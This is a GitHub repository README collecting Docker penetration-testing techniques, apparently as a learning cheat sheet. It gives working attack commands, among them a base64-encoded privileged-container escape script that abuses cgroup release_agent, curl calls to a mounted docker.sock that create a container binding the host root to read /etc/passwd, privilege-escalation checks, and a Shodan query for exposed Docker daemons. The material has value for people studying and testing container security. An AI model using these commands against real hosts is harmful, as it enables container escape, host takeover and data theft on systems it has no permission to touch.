Skip to content

agrawalsmart7/docker-pentesting

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
 
 
 
 
 
 
 
 

Repository files navigation

This repository assumes that you have basic knowledege about Docker. This repo's main focus is on collecting the ways to attack Docker Enviroment in one place.

docker-pentesting

For Pentesting application running inside Docker, we need to break it down into two way.

1 - When we are INSIDE the Container
2 - When we are OUTSIDE the Container with less privileges (Specifically, on Host)

Assuming we got a Shell on the server by exploiting RCE vulnerability or SSH, or any means.

When we are INSIDE the Container

Check if you are inside the container:

  • ls /.dockerenv

Otherways if this is not possible:

  • List all the directories of Cgroup, as this contains the Container ID, so we will know.
    grep '/docker/' /proc/1/cgroup

Check Sensitive Environment Variables inside the Container:

  • Retrieve all the Environment Variables
    env

Multi Container Application

  • Find the IP address, always check for Network Adaptors. If the container container two different IP, we can extend our attack surface.
    ifconfig

  • Use NMAP to scan the entire Network
    nmap

  • Take an example:-

-- If some other container runs postgreSQL database, you can easily discover by scanning the network of container, then you can access it and check for misconfigurations, default credentials. Not only this, but alot of other things you can find and check.

ARP Spoofing (Never do this)

We can arpspoof the traffic, and get delayed in the network requests.

Container Escaping

Check if the Container is running in Privileged Mode.

  • This command requires SYS_ADMIN flag, which --privileged flag contains it.
    ip link add dummy0 type dummy

  • Incase ip command is not found
    apt update && apt install iproute2

So you are inside a Privileged Container...

This below exploit was created by Felix Wilhelm

  • This command decodes the below base64 string and output the results to 'expoit.sh' file.
    echo ZD1gZGlybmFtZSAkKGxzIC14IC9zKi9mcy9jKi8qL3IqIHxoZWFkIC1uMSlgCm1rZGlyIC1wICRkL3c7ZWNobyAxID4kZC93L25vdGlmeV9vbl9yZWxlYXNlCnQ9YHNlZCAtbiAncy8uKlxwZXJkaXI9XChbXixdKlwpLiovXDEvcCcgL2V0Yy9tdGFiYAp0b3VjaCAvbzsgZWNobyAkdC9jID4kZC9yZWxlYXNlX2FnZW50O2VjaG8gIiMhL2Jpbi9zaAokMSA+JHQvbyIgPi9jO2NobW9kICt4IC9jO3NoIC1jICJlY2hvIDAgPiRkL3cvY2dyb3VwLnByb2NzIjtzbGVlcCAxO2NhdCAvbw== | base64 -d > exploit.sh

  • Below command will retrive the process running inside the Host, Hence Container Escaped. This exploit was uses cgroup's notification_on_release feature. So when you decode this base64 string, you will get a list of commands that the admin of this exploit uses, he also mentions that this is not a bug, but a feature. The best way to use this exploit is by using base64 encodeed string, as above.
    sh exploit.sh ps

Check if the docker.sock is mounted inside the container

  • This will retrieves the containers running by requesting to the docker daemon, as docker.sock is mounted on Container from Host as can easily access it.
    curl -XGET --unix-socket /var/run/docker.sock http://localhost/containers/json

So Docker Socket daemon is mounted on Container...

  • Run this command inside the container, this command will create a new container which we named escaping which mounts the host's root directory i.e / inside the new container at /host path and then we set Cmd directive to read the host's /etc/passwd file which we can access inside the container at /host/etc/passwd.
    curl -X POST -H "Content-Type: application/json" --unix-socket /run/docker.sock -d '{"Image":"ubuntu:latest", "Cmd":["cat", "/host/etc/passwd"], "Mounts":[{"Type":"bind", "Source":"/", "Target":"/host"}]}' "http://localhost/containers/create?name=escaping"

  • Start the new container (escaping is the container name we created).
    curl -X POST --unix-socket /run/docker.sock "http://localhost/containers/escaping/start"

  • Now we can read the file contents by reading the logs of the new container.
    curl --output - --unix-socket /run/docker.sock "http://localhost/containers/escaping/logs?stdout=true"

When we are OUTSIDE the Container (With Less Privileges)

Assuming we have got a shell but the user is having less privileges.

  • Check what users have access to docker group. In other words, what users can run docker command, so that if our user is mention in the docker group we can start a container, mount the directories, and can access the file system.
    grep docker /etc/group

  • Check if the docker SUID bit is set or not. This command will list each and every file which contains SUID bit set, now we can check if docker is available or not. If it is available we can run docker with root permissions.
    find / -perm -u=s -type f 2>/dev/null

  • Check who can access docker socket daemon. If our user have access to this docker, we can use API to create, run the container and get access to the root data.
    ls -l /var/run/docker.sock

So now, we can access docker? Below both commands are to list out the images/containers so that we can read the Environment variables if any.

  • List all the docker containers
    docker ps

  • List all the docker images
    docker images

  • We can read the config of either a Container or Image, by its name, that's why we first list out all the Containers/Images.
    docker inspect <Container id/name or Repository Name>

  • Check if any docker compose file is there. This command will find the file by its name.
    find / -name "docker-compose.*"

  • Check if any vulnerable version of docker is running, we can go for public CVE exploits.
    docker --version

Playing With Docker Daemon Remotely

  • Shodan query
    product:docker

  • Connect with docker daemon remotely and listing out the containers
    docker -H ip:port ps or docker -H ip:port ps -a

Now we can execute the containers, and do lot of fun. (But please don't execute in this way, you should have permission from the organization, if you do, No One is Responsible).

Suggestions/feedbacks

I would like to know more ways to exploit the app/environment running inside docker so if you have any suggestion to add, please let me know. Also please let me know if you found any mistakes in this repo, as I am not an expert but I am just trying to learn.

Contact

agrawalsmart7

References

About

No description, website, or topics provided.

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published